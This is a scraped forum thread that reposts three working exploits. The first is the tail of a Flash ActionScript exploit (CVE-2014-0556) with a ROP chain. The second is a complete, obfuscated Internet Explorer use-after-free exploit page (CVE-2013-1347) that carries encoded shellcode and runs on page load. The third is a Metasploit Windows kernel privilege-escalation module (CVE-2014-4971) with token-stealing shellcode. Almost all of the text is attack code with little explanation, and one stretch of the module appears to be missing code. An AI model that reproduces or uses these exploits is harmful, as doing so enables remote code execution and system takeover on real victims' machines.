// POP ESI # RETN ob[i0][11] = flash + 0x0000d83f // JMP [EAX] ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect() ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp' ob[i0][16] = 0xcccccccc // shellcode ob[i0][17] = 0xcccccccc // shellcode ob[i0][18] = 0xcccccccc // shellcode ob[i0][19] = 0xcccccccc // shellcode ob[i0][979] = flash + 0x0029913A // POP EAX # RETN ob[i0][980] = 0x00000f58 ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 str += flash.toString(16) var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) / 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } } [/LIST] Sursa: [ActionScript 3] CVE-2014-0556 - Pastebin.com
  24. Nytro
    MSIE Use After Free EXP/CVE-2013-1347 [URL="http://pastebin.com/JN2GiB8n#"][img=http://pastebin.com/i/t.gif][/URL] [LIST=1] <!doctype html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> <script> pRESSURA = eval('unescape'); fAHPARIC = CollectGarbage; dISCESA = '%u'; function rIGUARDI(rEPLACEMENT) { return pRESSURA(dISCESA + rEPLACEMENT.substring(4, 8) + dISCESA + rEPLACEMENT.substring(0, 4)); } function vILMENTE(tRIPARTITO) { rAPPACIATI = (tRIPARTITO >>> 24).toString((0x10)); if (rAPPACIATI.length == 0x1) rAPPACIATI = "0" + rAPPACIATI; mOSTRARTI = ((tRIPARTITO >>> 16) & (0xff)).toString((0x10)); if (mOSTRARTI.length == 0x1) mOSTRARTI = "0" + mOSTRARTI; tERRENE = ((tRIPARTITO >>> 8) & (0xff)).toString((0x10)); if (tERRENE.length == 0x1) tERRENE = "0" + tERRENE; pRINCIPIO = (tRIPARTITO & (0xff)).toString((0x10)); if (pRINCIPIO.length == 0x1) pRINCIPIO = "0" + pRINCIPIO; return rAPPACIATI + mOSTRARTI + tERRENE + pRINCIPIO; } function ue(dw) { return rIGUARDI(vILMENTE(dw)); } function setc() { var Then = new Date() Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3) document.cookie = "Cookie1=fucktheothers;expires=" + Then.toGMTString() } function readc() { var cookieString = new String(document.cookie); if (cookieString.indexOf("fucktheothers") == -1) { return 0 } else { return 1; } } function DropPayload() { // en = 77c10000 // kr = 77bc0000 // offset = 50000 var r = ""; r+= ue( 0x77bd4cfa ); // # POP EBP # RETN [msvcrt.dll] r+= ue( 0x77bd4cfa ); // # skip 4 bytes [msvcrt.dll] r += ue( 0x77BFFA1C); // # POP EBX # RETN [msvcrt.dll] r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201) for(i=0;i<=0x201;i++) { r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll] } r+= ue( 0x77be4de1 ); // # POP EAX # RETN [msvcrt.dll] r+= ue( 0x2cfe04a7 ); // # put delta into eax (-> put += 0x00000040 into edx) r+= ue( 0x77bfeb80 ); // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] r+= ue( 0x77c08fbc ); // # XCHG EAX,EDX # RETN [msvcrt.dll] r+= ue( 0x77bde33f ); // # POP ECX # RETN [msvcrt.dll] r+= ue( 0x77c0e062 ); // # &Writable location [msvcrt.dll] r+= ue( 0x77bf6116 ); // # POP EDI # RETN [msvcrt.dll] r+= ue( 0x77bf7a42 ); // # RETN (ROP NOP) [msvcrt.dll] r+= ue( 0x77beb8ba ); // # POP ESI # RETN [msvcrt.dll] r+= ue( 0x77bdaacc ); // # JMP [EAX] [msvcrt.dll] r+= ue( 0x77beb860 ); // # POP EAX # RETN [msvcrt.dll] r+= ue( 0x77bc1120 ); // # ptr to &VirtualProtect() [IAT msvcrt.dll] r+= ue( 0x77d03ad9); // # PUSHAD # RETN [user32.dll] r+= ue( 0x77c01025 ); // # ptr to 'push esp # ret ' [msvcrt.dll] return r; } function align_esp() { var r= ""; r += ue(0x77BFD801); return r; } function xchg_esp() { var r=""; r += ue(0x77BC5ED5); return r; } function helloWorld() { if (readc()) return; setc(); unicorn = unescape("ABCD"); unicorn2 = unescape("EEEE"); for (i=0; i < 2; i++) { unicorn += unescape("ABCD"); }unicorn += unescape("AB"); unicorn += DropPayload(); unicorn += "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7BD\uB8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919"; animvalues = align_esp(); for (i=0; i < 0x70/4; i++) { if (i == 0x70/4-1) { animvalues += xchg_esp(); } else { animvalues += align_esp(); } } animvalues += unicorn; for(i = 0; i < 13; i++) { animvalues += ";red"; } f0 = document.createElement('span'); document.body.appendChild(f0); f1 = document.createElement('span'); document.body.appendChild(f1); f2 = document.createElement('span'); document.body.appendChild(f2); document.body.contentEditable="true"; f2.appendChild(document.createElement('datalist')); f1.appendChild(document.createElement('span')); f1.appendChild(document.createElement('table')); try{ f0.offsetParent=null; }catch(e) { }f2.innerHTML=""; f0.appendChild(document.createElement('hr')); f1.innerHTML=""; fAHPARIC(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld());"> <t:ANIMATECOLOR id="myanim"/> </body> </html> @PhysicalDrive0 [/LIST] Sursa: MSIE Use After Free EXP/CVE-2013-1347 - Pastebin.com
  25. Nytro
    [h=1]Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel include Msf::Post::File include Msf::Post::Windows::FileInfo include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation', 'Description' => %q{ A vulnerability within Microsoft Bluetooth Personal Area Networking module, BthPan.sys, can allow an attacker to inject memory controlled by the attacker into an arbitrary location. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC 'Jay Smith <jsmith[at]korelogic.com>' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ ['Windows XP SP3', { 'HaliQuerySystemInfo' => 0x16bba, '_KPROCESS' => "\x44", '_TOKEN' => "\xc8", '_UPID' => "\x84", '_APLINKS' => "\x88" } ] ], 'References' => [ [ 'CVE', '2014-4971' ], [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ], [ 'OSVDB', '109387' ] ], 'DisclosureDate' => 'Jul 18 2014', 'DefaultTarget' => 0 )) end def ring0_shellcode tokenswap = "\x60\x64\xA1\x24\x01\x00\x00" tokenswap << "\x8B\x40\x44\x50\xBB\x04" tokenswap << "\x00\x00\x00\x8B\x80\x88" tokenswap << "\x00\x00\x00\x2D\x88" tokenswap << "\x00\x00\x00\x39\x98\x84" tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8" tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB" tokenswap << [session.sys.process.getpid].pack('V') tokenswap << "\x8B\x80\x88\x00\x00\x00" tokenswap << "\x2D\x88\x00\x00\x00" tokenswap << "\x39\x98\x84\x00\x00\x00" tokenswap << "\x75\xED\x89\xB8\xC8" tokenswap << "\x00\x00\x00\x61\xC3" end def fill_memory(proc, address, length, content) session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE") unless proc.memory.writable?(address) vprint_error("Failed to allocate memory") return nil end vprint_good("#{address} is now writable") result = proc.memory.write(address, content) if result.nil? vprint_error("Failed to write contents to memory") return nil end vprint_good("Contents successfully written to 0x#{address.to_s(16)}") return address end def disclose_addresses(t) addresses = {} hal_dispatch_table = find_haldispatchtable return nil if hal_dispatch_table.nil? addresses['halDispatchTable'] = hal_dispatch_table vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}") vprint_status('Getting the hal.dll base address...') hal_info = find_sys_base('hal.dll') if hal_info.nil? vprint_error('Failed to disclose hal.dll base address') return nil end hal_base = hal_info[0] vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}") hali_query_system_information = hal_base + t['HaliQuerySystemInfo'] addresses['HaliQuerySystemInfo'] = hali_query_system_information vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}") addresses end def check if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Safe end os = sysinfo["OS"] return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') return Exploit::CheckCode::Safe unless handle session.railgun.kernel32.CloseHandle(handle) return Exploit::CheckCode::Vulnerable end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') if handle.nil? fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device") end my_target = targets[0] print_status("Disclosing the HalDispatchTable address...") @addresses["halDispatchTable"] + 0x4, 0) session.railgun.kernel32.CloseHandle(handle) print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...") session.railgun.ntdll.NtQueryIntervalProfile(2, 4) print_status("Checking privileges after exploitation...") unless is_system? fail_with(Failure::Unknown, "The privilege escalation wasn't successful") end print_good("Privilege escalation successful!") p = payload.encoded print_status("Injecting #{p.length} bytes to memory and executing it...") unless execute_shellcode(p) fail_with(Failure::Unknown, "Error while executing the payload") end end end Sursa: http://www.exploit-db.com/exploits/34982/
×
×
  • Create New...